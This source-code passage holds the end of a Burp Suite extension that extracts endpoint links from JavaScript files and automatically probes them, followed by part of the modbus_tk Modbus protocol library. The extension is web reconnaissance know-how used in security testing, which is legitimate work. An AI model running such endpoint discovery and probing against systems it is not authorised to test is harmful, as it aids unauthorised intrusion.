        self.dynamicExclusionList = self.callbacks.loadExtensionSetting('exclusion_list') if self.callbacks.loadExtensionSetting('exclusion_list') else ''
        self.exclusionInput.setText(self.dynamicExclusionList)

    def make_request(self, base_request_url, link_found):
        '''
        Make a new request using Burp and analyze the response.
        If returns 200: add to sitemap

        base_request_url: string base URL (Origin/Referer) to resolve against
        link_found: string link extracted from a JS file
        '''
        # Parse base_request_url
        parsed_base_url = urlparse(base_request_url)
        base_http_protocol = parsed_base_url.scheme
        base_address_and_port = parsed_base_url.netloc.split(':')
        base_host = base_address_and_port[0]
        if len(base_address_and_port) > 1 and base_address_and_port[1]:
            base_port = int(base_address_and_port[1])
        else:
            # Default port from the scheme when none is explicit.
            base_port = 80 if (base_http_protocol == 'http') else 443
        # Try to make a valid URL from Origin + path found
        if link_found.startswith('http://') or link_found.startswith('https://'):
            target_url = link_found
        elif link_found.startswith('//'):
            # Protocol-relative link: inherit the base scheme.
            target_url = base_http_protocol + ':' + link_found
        elif link_found.startswith('/'):
            target_url = base_http_protocol + '://' + base_host + ':' + str(base_port) + link_found
        else:
            target_url = base_http_protocol + '://' + base_host + ':' + str(base_port) + '/' + link_found
        # Print the formated target URL
        # self.outputTxtArea.append("\n" + "\t" + "--->" + target_url)
        # Parse target_url
        parsed_url = urlparse(target_url)
        http_protocol = parsed_url.scheme
        address_and_port = parsed_url.netloc.split(':')
        host = address_and_port[0]
        if len(address_and_port) > 1 and address_and_port[1]:
            port = int(address_and_port[1])
        else:
            port = 80 if (http_protocol == 'http') else 443
        # Make request to the URL
        get_query = ''
        if parsed_url.query:
            get_query = '?' + parsed_url.query
        my_new_request_headers = [
            'GET ' + parsed_url.path + get_query + ' HTTP/1.1',
            'host: ' + host + ':' + str(port)
        ]
        my_new_request_body = ''
        my_new_request = self.helpers.buildHttpMessage(
            my_new_request_headers,
            self.helpers.stringToBytes(my_new_request_body)
        )
        # Send request
        my_http_service = self.helpers.buildHttpService(host, port, http_protocol)
        my_new_http_request_response = self.callbacks.makeHttpRequest(
            my_http_service,
            my_new_request
        )
        # Analyze the response
        if my_new_http_request_response.getResponse():
            analyzed_response = self.helpers.analyzeResponse(my_new_http_request_response.getResponse())
            if analyzed_response:
                status_code = analyzed_response.getStatusCode()
                # Debug target and http code
                # print('--> Request to ' + target_url + ' | HTTP Code: ' + str(status_code))
                # Logic for adding to sitemap is here
                if status_code in [200]:
                    self.callbacks.addToSiteMap(my_new_http_request_response)

    def doPassiveScan(self, ihrr):
        '''
        The Scanner invokes this method for each base request / response that is passively scanned.
        Note: Extensions should only analyze the HTTP messages provided during passive scanning, and should not make any new HTTP requests of their own.
        '''
        # NOTE(review): make_request() below does issue new HTTP requests,
        # contrary to the passive-scan guidance quoted above.
        try:
            analyzed_request = self.helpers.analyzeRequest(ihrr.getRequest())
            request_headers = analyzed_request.getHeaders()
            # Get Referer or origin to make a request
            origin = self.lastKnownOrigin
            referer = self.lastKnownReferer
            for header in request_headers:
                if header.lower().startswith('referer'):
                    [header_name, referer] = header.replace(' ','').split(':', 1)
                    self.lastKnownReferer = referer
                if header.lower().startswith('origin'):
                    [header_name, origin] = header.replace(' ','').split(':', 1)
                    self.lastKnownOrigin = origin
            urlReq = ihrr.getUrl()
            testString = str(urlReq)
            linkA = linkAnalyse(ihrr,self.helpers)
            # check if JS file
            if ".js" in str(urlReq):
                # Exclude casual JS files
                self.dynamicExclusionList = str(self.exclusionInput.getText().strip()).split(',') if str(self.exclusionInput.getText().strip()) else None
                if self.dynamicExclusionList and any(x in testString for x in self.dynamicExclusionList):
                    print("\n" + "[-] URL excluded " + str(urlReq))
                else:
                    self.outputTxtArea.append("\n" + "[+] Valid URL found: " + str(urlReq))
                    issueText = linkA.analyseURL()
                    for counter, issueText in enumerate(issueText):
                        #print("TEST Value returned SUCCESS")
                        self.outputTxtArea.append("\n" + "\t" + str(counter)+' - ' +issueText['link'])
                        # Resolve each found link against Origin, falling
                        # back to Referer, and probe it.
                        if self.lastKnownOrigin:
                            self.make_request(self.lastKnownOrigin, issueText['link'])
                        else:
                            if self.lastKnownReferer:
                                self.make_request(self.lastKnownReferer, issueText['link'])
            issues = ArrayList()
            issues.add(SRI(ihrr, self.helpers))
            return issues
        except UnicodeEncodeError:
            print ("Error in URL decode.")
        return None

    def consolidateDuplicateIssues(self, isb, isa):
        # -1: always report the existing issue (never merge duplicates).
        return -1

    def extensionUnloaded(self):
        print "Burp JS LinkFinder unloaded"
        return
class linkAnalyse():
    """Extract endpoint-like strings from a JS response body.

    Wraps one Burp request/response pair and applies the LinkFinder regex
    (credit: GerbenJavado/LinkFinder) to the decoded response.
    """

    def __init__(self, reqres, helpers):
        self.helpers = helpers
        self.reqres = reqres

    # Class-level pattern (referenced as self.regex_str in analyseURL).
    # Used with re.VERBOSE, so whitespace and '#' comments inside the
    # string are ignored by the regex engine.
    regex_str = """
      (?:"|')                               # Start newline delimiter
      (
        ((?:[a-zA-Z]{1,10}://|//)           # Match a scheme [a-Z]*1-10 or //
        [^"'/]{1,}\.                        # Match a domainname (any character + dot)
        [a-zA-Z]{2,}[^"']{0,})              # The domainextension and/or path
        |
        ((?:/|\.\./|\./)                    # Start with /,../,./
        [^"'><,;| *()(%%$^/\\\[\]]          # Next character can't be...
        [^"'><,;|()]{1,})                   # Rest of the characters can't be
        |
        ([a-zA-Z0-9_\-/]{1,}/               # Relative endpoint with /
        [a-zA-Z0-9_\-/]{1,}                 # Resource name
        \.(?:[a-zA-Z]{1,4}|action)          # Rest + extension (length 1-4 or action)
        (?:[\?|/][^"|']{0,}|))              # ? mark with parameters
        |
        ([a-zA-Z0-9_\-]{1,}                 # filename
        \.(?:php|asp|aspx|jsp|json|
        action|html|js|txt|xml)             # . + extension
        (?:\?[^"|']{0,}|))                  # ? mark with parameters
      )
      (?:"|')                               # End newline delimiter
    """

    def parser_file(self, content, regex_str, mode=1, more_regex=None, no_dup=1):
        """Return [{'link': str}, ...] for every regex match in *content*.

        no_dup: when truthy, drop duplicate links (first occurrence wins).
        more_regex: optional second pattern a link must also match.
        mode: unused; kept for interface compatibility.
        """
        #print ("TEST parselfile #2")
        regex = re.compile(regex_str, re.VERBOSE)
        items = [{"link": m.group(1)} for m in re.finditer(regex, content)]
        if no_dup:
            # Remove duplication
            all_links = set()
            no_dup_items = []
            for item in items:
                if item["link"] not in all_links:
                    all_links.add(item["link"])
                    no_dup_items.append(item)
            items = no_dup_items
        # Match Regex
        filtered_items = []
        for item in items:
            # Remove other capture groups from regex results
            if more_regex:
                if re.search(more_regex, item["link"]):
                    #print ("TEST parselfile #3")
                    filtered_items.append(item)
            else:
                filtered_items.append(item)
        return filtered_items

    # Potential for use in the future...
    def threadAnalysis(self):
        # NOTE(review): `session` is undefined here, and analyseURL() is
        # called immediately rather than passed as the target — this method
        # would fail if invoked; it appears to be dead/experimental code.
        thread = Thread(target=self.analyseURL(), args=(session,))
        thread.daemon = True
        thread.start()

    def analyseURL(self):
        """Return parsed link dicts if the response is a script, else ""."""
        endpoints = ""
        #print("TEST AnalyseURL #1")
        mime_type=self.helpers.analyzeResponse(self.reqres.getResponse()).getStatedMimeType()
        if mime_type.lower() == 'script':
            url = self.reqres.getUrl()
            # Round-trip through base64 to coerce the Java byte[] response
            # into a Python str before regex parsing.
            encoded_resp=binascii.b2a_base64(self.reqres.getResponse())
            decoded_resp=base64.b64decode(encoded_resp)
            endpoints=self.parser_file(decoded_resp, self.regex_str)
            #print("TEST AnalyseURL #2")
            return endpoints
        return endpoints
class SRI(IScanIssue, ITab):
    """Burp scanner issue reporting the result of LinkFinder JS analysis.

    Implements Burp's IScanIssue interface by delegating location data to
    the wrapped request/response pair and returning fixed metadata for the
    informational finding itself.
    """
    def __init__(self, reqres, helpers):
        self.helpers = helpers
        self.reqres = reqres
    def getHost(self):
        return self.reqres.getHost()
    def getPort(self):
        return self.reqres.getPort()
    def getProtocol(self):
        return self.reqres.getProtocol()
    def getUrl(self):
        return self.reqres.getUrl()
    def getIssueName(self):
        return "Linkfinder Analysed JS files"
    def getIssueType(self):
        # extension-generated issue type; see
        # https://portswigger.net/burp/help/scanner_issuetypes.html
        return 0x08000000
    def getSeverity(self):
        # one of "High", "Medium", "Low", "Information" or "False positive"
        return "Information"
    def getConfidence(self):
        # one of "Certain", "Firm" or "Tentative"
        return "Certain"
    def getIssueBackground(self):
        return "JS files holds links to other parts of web applications. Refer to TAB for results."
    def getRemediationBackground(self):
        return "This is an <b>informational</b> finding only.<br>"
    def getIssueDetail(self):
        detail = "Burp Scanner has analysed the following JS file for links: <b>%s</b><br><br>"
        return detail % self.reqres.getUrl().toString()
    def getRemediationDetail(self):
        return None
    def getHttpMessages(self):
        return [self.reqres]
    def getHttpService(self):
        return self.reqres.getHttpService()
# Entry point: under Burp's Jython runtime __name__ is 'main' rather than
# '__main__', so both spellings are accepted.  NOTE(review): EventQueue/Run
# presumably come from Java Swing imports above -- schedules the extension
# on the AWT event dispatch thread.
if __name__ in ('__main__', 'main'):
    EventQueue.invokeLater(Run(BurpExtender))
|
modbus.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Modbus TestKit: Implementation of Modbus protocol in python
(C)2009 - Luc Jean - luc.jean@gmail.com
(C)2009 - Apidev - http://www.apidev.fr
This is distributed under GNU LGPL license, see license.txt
History:
2010/01/08 - RD: Update master.execute(..) to calculate lengths automatically based on requested command
"""
from __future__ import with_statement
import struct
import threading
from modbus_tk import LOGGER
from modbus_tk import defines
from modbus_tk.exceptions import(
ModbusError, ModbusFunctionNotSupportedError, DuplicatedKeyError, MissingKeyError, InvalidModbusBlockError,
InvalidArgumentError, OverlapModbusBlockError, OutOfModbusBlockError, ModbusInvalidResponseError,
ModbusInvalidRequestError
)
from modbus_tk.hooks import call_hooks
from modbus_tk.utils import threadsafe_function, get_log_buffer
# modbus_tk is using the python logging mechanism
# you can define this logger in your app in order to see its prints logs
class Query(object):
    """Abstract MAC-layer adapter.

    A concrete subclass wraps/unwraps modbus application PDUs with the
    framing of one specific transport (e.g. the TCP MBAP header or the RTU
    address+CRC envelope).  Every method here must be overridden.
    """
    def __init__(self):
        """Nothing to initialise at this level."""
        pass
    def build_request(self, pdu, slave):
        """Wrap a request *pdu* for *slave* with MAC-layer framing.

        Returns the framed request as a string.
        """
        raise NotImplementedError()
    def parse_response(self, response):
        """Strip the MAC-layer framing from a full *response*.

        Returns the bare application-protocol response pdu as a string.
        """
        raise NotImplementedError()
    def parse_request(self, request):
        """Strip the MAC-layer framing from a full *request*.

        Returns the bare request pdu as a string together with the slave id.
        """
        raise NotImplementedError()
    def build_response(self, response_pdu):
        """Wrap *response_pdu* with MAC-layer framing.

        Returns the framed response as a string.
        """
        raise NotImplementedError()
class Master(object):
    """
    This class implements the Modbus Application protocol for a master.
    To be subclassed with a class implementing the MAC layer (TCP or RTU):
    subclasses provide _do_open/_do_close/_send/_recv/_make_query.
    """
    def __init__(self, timeout_in_sec, hooks=None):
        """Constructor: can define a timeout"""
        # NOTE(review): ``hooks`` is accepted but never stored or used here
        # -- presumably kept for backward compatibility with older callers.
        self._timeout = timeout_in_sec
        self._verbose = False
        self._is_opened = False
    def __del__(self):
        """Destructor: close the connection"""
        self.close()
    def set_verbose(self, verbose):
        """print some more log prints for debug purpose"""
        self._verbose = verbose
    def open(self):
        """open the communication with the slave (no-op if already open)"""
        if not self._is_opened:
            self._do_open()
            self._is_opened = True
    def close(self):
        """close the communication with the slave"""
        # only marked closed when _do_close reports success (truthy return)
        if self._is_opened:
            ret = self._do_close()
            if ret:
                self._is_opened = False
    def _do_open(self):
        """Open the MAC layer"""
        raise NotImplementedError()
    def _do_close(self):
        """Close the MAC layer"""
        raise NotImplementedError()
    def _send(self, buf):
        """Send data to a slave on the MAC layer"""
        raise NotImplementedError()
    def _recv(self, expected_length):
        """
        Receive data from a slave on the MAC layer
        if expected_length is >=0 then consider that the response is done when this
        number of bytes is received
        """
        raise NotImplementedError()
    def _make_query(self):
        """
        Returns an instance of a Query subclass implementing
        the MAC layer protocol
        """
        raise NotImplementedError()
    @threadsafe_function
    def execute(
        self, slave, function_code, starting_address, quantity_of_x=0, output_value=0, data_format="", expected_length=-1, write_starting_address_FC23=0):
        """
        Execute a modbus query and returns the data part of the answer as a tuple
        The returned tuple depends on the query function code. see modbus protocol
        specification for details
        data_format makes possible to extract the data like defined in the
        struct python module documentation

        :param slave: slave id; 0 broadcasts the request (nothing is read back)
        :param function_code: one of the defines.* modbus function codes
        :param starting_address: first coil/register address (also carries the
            sub-function code for defines.DIAGNOSTIC)
        :param quantity_of_x: number of coils/registers to read
        :param output_value: value(s) to write; a sequence for multi-write codes
        :param data_format: optional struct format used to decode the response
        :param expected_length: expected raw response size; computed from the
            function code when negative
        :param write_starting_address_FC23: write address for function code 23
        """
        pdu = ""
        is_read_function = False
        nb_of_digits = 0
        # open the connection if it is not already done
        self.open()
        # Build the modbus pdu and the format of the expected data.
        # It depends of function code. see modbus specifications for details.
        if function_code == defines.READ_COILS or function_code == defines.READ_DISCRETE_INPUTS:
            is_read_function = True
            pdu = struct.pack(">BHH", function_code, starting_address, quantity_of_x)
            # bit values are packed 8 per byte; round up to whole bytes
            byte_count = quantity_of_x // 8
            if (quantity_of_x % 8) > 0:
                byte_count += 1
            nb_of_digits = quantity_of_x
            if not data_format:
                data_format = ">" + (byte_count * "B")
            if expected_length < 0:
                # No length was specified and calculated length can be used:
                # slave + func + bytcodeLen + bytecode + crc1 + crc2
                expected_length = byte_count + 5
        elif function_code == defines.READ_INPUT_REGISTERS or function_code == defines.READ_HOLDING_REGISTERS:
            is_read_function = True
            pdu = struct.pack(">BHH", function_code, starting_address, quantity_of_x)
            if not data_format:
                data_format = ">" + (quantity_of_x * "H")
            if expected_length < 0:
                # No length was specified and calculated length can be used:
                # slave + func + bytcodeLen + bytecode x 2 + crc1 + crc2
                expected_length = 2 * quantity_of_x + 5
        elif (function_code == defines.WRITE_SINGLE_COIL) or (function_code == defines.WRITE_SINGLE_REGISTER):
            if function_code == defines.WRITE_SINGLE_COIL:
                # modbus encodes coil ON as 0xff00, OFF as 0x0000
                if output_value != 0:
                    output_value = 0xff00
                fmt = ">BHH"
            else:
                # allow signed register writes by switching the pack format
                fmt = ">BH"+("H" if output_value >= 0 else "h")
            pdu = struct.pack(fmt, function_code, starting_address, output_value)
            if not data_format:
                data_format = ">HH"
            if expected_length < 0:
                # No length was specified and calculated length can be used:
                # slave + func + adress1 + adress2 + value1+value2 + crc1 + crc2
                expected_length = 8
        elif function_code == defines.WRITE_MULTIPLE_COILS:
            byte_count = len(output_value) // 8
            if (len(output_value) % 8) > 0:
                byte_count += 1
            pdu = struct.pack(">BHHB", function_code, starting_address, len(output_value), byte_count)
            # pack the coil values 8 per byte, LSB first
            i, byte_value = 0, 0
            for j in output_value:
                if j > 0:
                    byte_value += pow(2, i)
                if i == 7:
                    pdu += struct.pack(">B", byte_value)
                    i, byte_value = 0, 0
                else:
                    i += 1
            # flush the last, partially-filled byte if any
            if i > 0:
                pdu += struct.pack(">B", byte_value)
            if not data_format:
                data_format = ">HH"
            if expected_length < 0:
                # No length was specified and calculated length can be used:
                # slave + func + adress1 + adress2 + outputQuant1 + outputQuant2 + crc1 + crc2
                expected_length = 8
        elif function_code == defines.WRITE_MULTIPLE_REGISTERS:
            # a user-supplied data_format overrides the default 2-bytes-per-
            # register sizing of the payload
            if output_value and data_format:
                byte_count = struct.calcsize(data_format)
            else:
                byte_count = 2 * len(output_value)
            pdu = struct.pack(">BHHB", function_code, starting_address, byte_count // 2, byte_count)
            if output_value and data_format:
                pdu += struct.pack(data_format, *output_value)
            else:
                for j in output_value:
                    fmt = "H" if j >= 0 else "h"
                    pdu += struct.pack(">" + fmt, j)
            # data_format is now used to process response which is always 2 registers:
            # 1) data address of first register, 2) number of registers written
            data_format = ">HH"
            if expected_length < 0:
                # No length was specified and calculated length can be used:
                # slave + func + adress1 + adress2 + outputQuant1 + outputQuant2 + crc1 + crc2
                expected_length = 8
        elif function_code == defines.READ_EXCEPTION_STATUS:
            pdu = struct.pack(">B", function_code)
            data_format = ">B"
            if expected_length < 0:
                # No length was specified and calculated length can be used:
                expected_length = 5
        elif function_code == defines.DIAGNOSTIC:
            # SubFuncCode are in starting_address
            pdu = struct.pack(">BH", function_code, starting_address)
            if len(output_value) > 0:
                for j in output_value:
                    # copy data in pdu
                    pdu += struct.pack(">B", j)
                if not data_format:
                    data_format = ">" + (len(output_value) * "B")
                if expected_length < 0:
                    # No length was specified and calculated length can be used:
                    # slave + func + SubFunc1 + SubFunc2 + Data + crc1 + crc2
                    expected_length = len(output_value) + 6
        elif function_code == defines.READ_WRITE_MULTIPLE_REGISTERS:
            is_read_function = True
            byte_count = 2 * len(output_value)
            pdu = struct.pack(
                ">BHHHHB",
                function_code, starting_address, quantity_of_x, write_starting_address_FC23,
                len(output_value), byte_count
            )
            for j in output_value:
                fmt = "H" if j >= 0 else "h"
                # copy data in pdu
                pdu += struct.pack(">"+fmt, j)
            if not data_format:
                data_format = ">" + (quantity_of_x * "H")
            if expected_length < 0:
                # No lenght was specified and calculated length can be used:
                # slave + func + bytcodeLen + bytecode x 2 + crc1 + crc2
                expected_length = 2 * quantity_of_x + 5
        else:
            raise ModbusFunctionNotSupportedError("The {0} function code is not supported. ".format(function_code))
        # instantiate a query which implements the MAC (TCP or RTU) part of the protocol
        query = self._make_query()
        # add the mac part of the protocol to the request
        request = query.build_request(pdu, slave)
        # send the request to the slave
        # a hook may rewrite the request before it goes on the wire
        retval = call_hooks("modbus.Master.before_send", (self, request))
        if retval is not None:
            request = retval
        if self._verbose:
            LOGGER.debug(get_log_buffer("-> ", request))
        self._send(request)
        call_hooks("modbus.Master.after_send", (self, ))
        if slave != 0:
            # receive the data from the slave
            response = self._recv(expected_length)
            retval = call_hooks("modbus.Master.after_recv", (self, response))
            if retval is not None:
                response = retval
            if self._verbose:
                LOGGER.debug(get_log_buffer("<- ", response))
            # extract the pdu part of the response
            response_pdu = query.parse_response(response)
            # analyze the received data
            (return_code, byte_2) = struct.unpack(">BB", response_pdu[0:2])
            # NOTE(review): per the modbus spec an exception response sets the
            # high bit of the function code, i.e. values >= 0x80; this test
            # uses a strict > 0x80 comparison.
            if return_code > 0x80:
                # the slave has returned an error
                exception_code = byte_2
                raise ModbusError(exception_code)
            else:
                if is_read_function:
                    # get the values returned by the reading function
                    byte_count = byte_2
                    data = response_pdu[2:]
                    if byte_count != len(data):
                        # the byte count in the pdu is invalid
                        raise ModbusInvalidResponseError(
                            "Byte count is {0} while actual number of bytes is {1}. ".format(byte_count, len(data))
                        )
                else:
                    # returns what is returned by the slave after a writing function
                    data = response_pdu[1:]
                # returns the data as a tuple according to the data_format
                # (calculated based on the function or user-defined)
                result = struct.unpack(data_format, data)
                if nb_of_digits > 0:
                    # unpack the packed bits of a coil/discrete-input read
                    # into one 0/1 value per requested digit, LSB first
                    digits = []
                    for byte_val in result:
                        for i in range(8):
                            if len(digits) >= nb_of_digits:
                                break
                            digits.append(byte_val % 2)
                            byte_val = byte_val >> 1
                    result = tuple(digits)
                return result
    def set_timeout(self, timeout_in_sec):
        """Defines a timeout on the MAC layer"""
        self._timeout = timeout_in_sec
    def get_timeout(self):
        """Gets the current value of the MAC layer timeout"""
        return self._timeout
class ModbusBlock(object):
    """Holds the values for a contiguous range of modbus addresses."""
    def __init__(self, starting_address, size, name=''):
        """Remember the base address and zero-fill the value array.

        ``name`` is accepted for API compatibility but is not stored.
        """
        self.starting_address = starting_address
        self._data = [0] * size
        self.size = len(self._data)
    def is_in(self, starting_address, size):
        """Return True if a block at (starting_address, size) would overlap this one."""
        if starting_address > self.starting_address:
            return starting_address < self.starting_address + self.size
        if starting_address < self.starting_address:
            return self.starting_address < starting_address + size
        return True
    def __getitem__(self, item):
        """Delegate indexing and slicing to the underlying value list."""
        return self._data[item]
    def __setitem__(self, item, value):
        """Fire the setitem hook, then delegate assignment to the value list."""
        call_hooks("modbus.ModbusBlock.setitem", (self, item, value))
        return self._data.__setitem__(item, value)
class Slave(object):
    """
    This class define a modbus slave which is in charge of making the action
    asked by a modbus query.  Its data lives in ModbusBlock instances grouped
    by block type (coils, discrete inputs, holding/input registers).
    """
    def __init__(self, slave_id, unsigned=True, memory=None):
        """Constructor

        :param slave_id: id of this slave on the bus
        :param unsigned: treat register values as unsigned (struct 'H'/'B')
            instead of signed ('h'/'b')
        :param memory: optional pre-built {block_type: [ModbusBlock]} map,
            allowing several slaves to share the same memory
        """
        self._id = slave_id
        # treat every value written to/read from register as an unsigned value
        self.unsigned = unsigned
        # the map registring all blocks of the slave
        self._blocks = {}
        # a shortcut to find blocks per type
        if memory is None:
            self._memory = {
                defines.COILS: [],
                defines.DISCRETE_INPUTS: [],
                defines.HOLDING_REGISTERS: [],
                defines.ANALOG_INPUTS: [],
            }
        else:
            self._memory = memory
        # a lock for mutual access to the _blocks and _memory maps
        self._data_lock = threading.RLock()
        # map modbus function code to a function:
        self._fn_code_map = {
            defines.READ_COILS: self._read_coils,
            defines.READ_DISCRETE_INPUTS: self._read_discrete_inputs,
            defines.READ_INPUT_REGISTERS: self._read_input_registers,
            defines.READ_HOLDING_REGISTERS: self._read_holding_registers,
            defines.WRITE_SINGLE_COIL: self._write_single_coil,
            defines.WRITE_SINGLE_REGISTER: self._write_single_register,
            defines.WRITE_MULTIPLE_COILS: self._write_multiple_coils,
            defines.WRITE_MULTIPLE_REGISTERS: self._write_multiple_registers,
        }
    def _get_block_and_offset(self, block_type, address, length):
        """returns the block and offset corresponding to the given address

        Linear scan over the blocks of this type; raises ModbusError with
        ILLEGAL_DATA_ADDRESS when no block covers [address, address+length).
        """
        for block in self._memory[block_type]:
            if address >= block.starting_address:
                offset = address - block.starting_address
                if block.size >= offset + length:
                    return block, offset
        raise ModbusError(defines.ILLEGAL_DATA_ADDRESS)
    def _read_digital(self, block_type, request_pdu):
        """read the value of coils and discrete inputs

        Returns the response payload: a byte count followed by the bit
        values packed 8 per byte, LSB first.
        """
        (starting_address, quantity_of_x) = struct.unpack(">HH", request_pdu[1:5])
        if (quantity_of_x <= 0) or (quantity_of_x > 2000):
            # maximum allowed size is 2000 bits in one reading
            raise ModbusError(defines.ILLEGAL_DATA_VALUE)
        block, offset = self._get_block_and_offset(block_type, starting_address, quantity_of_x)
        values = block[offset:offset+quantity_of_x]
        # pack bits in bytes
        byte_count = quantity_of_x // 8
        if (quantity_of_x % 8) > 0:
            byte_count += 1
        # write the response header
        response = struct.pack(">B", byte_count)
        i, byte_value = 0, 0
        for coil in values:
            if coil:
                byte_value += (1 << i)
            if i >= 7:
                # write the values of 8 bits in a byte
                response += struct.pack(">B", byte_value)
                # reset the counters
                i, byte_value = 0, 0
            else:
                i += 1
        # if there is remaining bits: add one more byte with their values
        if i > 0:
            # NOTE(review): only this trailing byte honours self.unsigned,
            # the full bytes above always use ">B" -- presumably harmless
            # since byte_value is built from non-negative bit sums.
            fmt = "B" if self.unsigned else "b"
            response += struct.pack(">"+fmt, byte_value)
        return response
    def _read_coils(self, request_pdu):
        """handle read coils modbus function (function code 1)"""
        call_hooks("modbus.Slave.handle_read_coils_request", (self, request_pdu))
        return self._read_digital(defines.COILS, request_pdu)
    def _read_discrete_inputs(self, request_pdu):
        """handle read discrete inputs modbus function (function code 2)"""
        call_hooks("modbus.Slave.handle_read_discrete_inputs_request", (self, request_pdu))
        return self._read_digital(defines.DISCRETE_INPUTS, request_pdu)
    def _read_registers(self, block_type, request_pdu):
        """read the value of holding and input registers

        Returns the response payload: a byte count followed by each register
        value on 2 big-endian bytes.
        """
        (starting_address, quantity_of_x) = struct.unpack(">HH", request_pdu[1:5])
        if (quantity_of_x <= 0) or (quantity_of_x > 125):
            # maximum allowed size is 125 registers in one reading
            LOGGER.debug("quantity_of_x is %d", quantity_of_x)
            raise ModbusError(defines.ILLEGAL_DATA_VALUE)
        # look for the block corresponding to the request
        block, offset = self._get_block_and_offset(block_type, starting_address, quantity_of_x)
        # get the values
        values = block[offset:offset+quantity_of_x]
        # write the response header
        response = struct.pack(">B", 2 * quantity_of_x)
        # add the values of every register on 2 bytes
        for reg in values:
            fmt = "H" if self.unsigned else "h"
            response += struct.pack(">"+fmt, reg)
        return response
    def _read_holding_registers(self, request_pdu):
        """handle read holding registers modbus function (function code 3)"""
        call_hooks("modbus.Slave.handle_read_holding_registers_request", (self, request_pdu))
        return self._read_registers(defines.HOLDING_REGISTERS, request_pdu)
    def _read_input_registers(self, request_pdu):
        """handle read input registers modbus function (function code 4)"""
        call_hooks("modbus.Slave.handle_read_input_registers_request", (self, request_pdu))
        return self._read_registers(defines.ANALOG_INPUTS, request_pdu)
    def _write_multiple_registers(self, request_pdu):
        """execute modbus function 16"""
        call_hooks("modbus.Slave.handle_write_multiple_registers_request", (self, request_pdu))
        # get the starting address and the number of items from the request pdu
        (starting_address, quantity_of_x, byte_count) = struct.unpack(">HHB", request_pdu[1:6])
        if (quantity_of_x <= 0) or (quantity_of_x > 123) or (byte_count != (quantity_of_x * 2)):
            # maximum allowed size is 123 registers in one reading
            raise ModbusError(defines.ILLEGAL_DATA_VALUE)
        # look for the block corresponding to the request
        block, offset = self._get_block_and_offset(defines.HOLDING_REGISTERS, starting_address, quantity_of_x)
        count = 0
        # copy each 2-byte register value from the pdu into the block
        for i in range(quantity_of_x):
            count += 1
            fmt = "H" if self.unsigned else "h"
            block[offset+i] = struct.unpack(">"+fmt, request_pdu[6+2*i:8+2*i])[0]
        # response echoes the start address and the number of written registers
        return struct.pack(">HH", starting_address, count)
    def _write_multiple_coils(self, request_pdu):
        """execute modbus function 15"""
        call_hooks("modbus.Slave.handle_write_multiple_coils_request", (self, request_pdu))
        # get the starting address and the number of items from the request pdu
        (starting_address, quantity_of_x, byte_count) = struct.unpack(">HHB", request_pdu[1:6])
        expected_byte_count = quantity_of_x // 8
        if (quantity_of_x % 8) > 0:
            expected_byte_count += 1
        if (quantity_of_x <= 0) or (quantity_of_x > 1968) or (byte_count != expected_byte_count):
            # maximum allowed size is 1968 coils
            raise ModbusError(defines.ILLEGAL_DATA_VALUE)
        # look for the block corresponding to the request
        block, offset = self._get_block_and_offset(defines.COILS, starting_address, quantity_of_x)
        count = 0
        # unpack the bits of each payload byte, LSB first, into the block
        for i in range(byte_count):
            if count >= quantity_of_x:
                break
            fmt = "B" if self.unsigned else "b"
            (byte_value, ) = struct.unpack(">"+fmt, request_pdu[6+i:7+i])
            for j in range(8):
                if count >= quantity_of_x:
                    break
                if byte_value & (1 << j):
                    block[offset+i*8+j] = 1
                else:
                    block[offset+i*8+j] = 0
                count += 1
        # response echoes the start address and the number of written coils
        return struct.pack(">HH", starting_address, count)
    def _write_single_register(self, request_pdu):
        """execute modbus function 6"""
        call_hooks("modbus.Slave.handle_write_single_register_request", (self, request_pdu))
        fmt = "H" if self.unsigned else "h"
        (data_address, value) = struct.unpack(">H"+fmt, request_pdu[1:5])
        block, offset = self._get_block_and_offset(defines.HOLDING_REGISTERS, data_address, 1)
        block[offset] = value
        # returns echo of the command
        return request_pdu[1:]
    def _write_single_coil(self, request_pdu):
        """execute modbus function 5"""
        call_hooks("modbus.Slave.handle_write_single_coil_request", (self, request_pdu))
        (data_address, value) = struct.unpack(">HH", request_pdu[1:5])
        block, offset = self._get_block_and_offset(defines.COILS, data_address, 1)
        # per the modbus spec 0xff00 means ON, 0x0000 means OFF and anything
        # else is invalid
        if value == 0:
            block[offset] = 0
        elif value == 0xff00:
            block[offset] = 1
        else:
            raise ModbusError(defines.ILLEGAL_DATA_VALUE)
        # returns echo of the command
        return request_pdu[1:]
    def handle_request(self, request_pdu, broadcast=False):
        """
        parse the request pdu, makes the corresponding action
        and returns the response pdu
        """
        # thread-safe
        with self._data_lock:
            try:
                # a hook may short-circuit the whole request
                retval = call_hooks("modbus.Slave.handle_request", (self, request_pdu))
                if retval is not None:
                    return retval
                # get the function code
                (function_code, ) = struct.unpack(">B", request_pdu[0:1])
                # check if the function code is valid. If not returns error response
                if function_code not in self._fn_code_map:
                    raise ModbusError(defines.ILLEGAL_FUNCTION)
                # if read query is broadcasted raises an error
                cant_be_broadcasted = (
                    defines.READ_COILS,
                    defines.READ_DISCRETE_INPUTS,
                    defines.READ_INPUT_REGISTERS,
                    defines.READ_HOLDING_REGISTERS
                )
                if broadcast and (function_code in cant_be_broadcasted):
                    raise ModbusInvalidRequestError("Function %d can not be broadcasted" % function_code)
                # execute the corresponding function
                response_pdu = self._fn_code_map[function_code](request_pdu)
                if response_pdu:
                    if broadcast:
                        # broadcast requests are executed but never answered
                        call_hooks("modbus.Slave.on_handle_broadcast", (self, response_pdu))
                        LOGGER.debug("broadcast: %s", get_log_buffer("!!", response_pdu))
                        return ""
                    else:
                        return struct.pack(">B", function_code) + response_pdu
                raise Exception("No response for function %d" % function_code)
            except ModbusError as excpt:
                # NOTE(review): if the handle_request hook itself raises a
                # ModbusError, function_code is not yet bound here -- TODO
                # confirm whether that can happen in practice.
                LOGGER.debug(str(excpt))
                call_hooks("modbus.Slave.on_exception", (self, function_code, excpt))
                # error response: function code with high bit set + exception code
                return struct.pack(">BB", function_code+128, excpt.get_exception_code())
    def add_block(self, block_name, block_type, starting_address, size):
        """Add a new block identified by its name"""
        # thread-safe
        with self._data_lock:
            if size <= 0:
                raise InvalidArgumentError("size must be a positive number")
            if starting_address < 0:
                raise InvalidArgumentError("starting address must be zero or positive number")
            if block_name in self._blocks:
                raise DuplicatedKeyError("Block {0} already exists. ".format(block_name))
            if block_type not in self._memory:
                raise InvalidModbusBlockError("Invalid block type {0}".format(block_type))
            # check that the new block doesn't overlap an existing block
            # it means that only 1 block per type must correspond to a given address
            # for example: it must not have 2 holding registers at address 100
            index = 0
